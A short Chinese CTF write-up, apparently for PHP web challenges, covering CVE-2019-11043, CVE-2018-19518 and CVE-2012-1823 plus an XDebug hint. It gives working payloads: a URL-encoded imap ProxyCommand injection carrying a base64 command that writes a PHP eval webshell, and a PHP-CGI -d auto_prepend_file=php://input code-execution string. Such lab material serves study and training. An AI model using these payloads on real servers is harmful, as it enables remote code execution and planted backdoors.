web311:cve-2019-11043

在 Nginx + PHP-FPM 环境下
PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:
PHP 7.0 版本、PHP 7.1 版本、PHP 7.2 版本、PHP 7.3 版本


web312 PHP imap 远程命令执行漏洞(CVE-2018-19518)

poc:
hostname=x+-oProxyCommand%3decho%09通过base64加密过的执行语句|base64%09-d|sh}
本题payload:
先对一句话base64,再用echo解码
echo "一句话" | base64 -d >/var/www/html/shell.php
hostname=x+-oProxyCommand%3decho%09ZWNobyAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VVzIxdGJWMHBPejgrIiB8IGJhc2U2NCAtZCA+L3Zhci93d3cvaHRtbC9zaGVsbC5waHA%3D|base64%09-d|sh}
=要url编码

web313:CVE-2012-1823

通过阅读源码,我发现cgi模式下有如下一些参数可用:
-c指定php.ini文件的位置-n不要加载php.ini文件-d指定配置项-b启动fastcgi进程-s显示文件源码-T执行指定次该文件-h和-?显示帮助
-d的用法
<?php echo shell_exec('ls');?>
?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input


web315:XDebug 远程调试漏洞
hint
debug开启,端口9000
451

被折叠的 条评论
为什么被折叠?



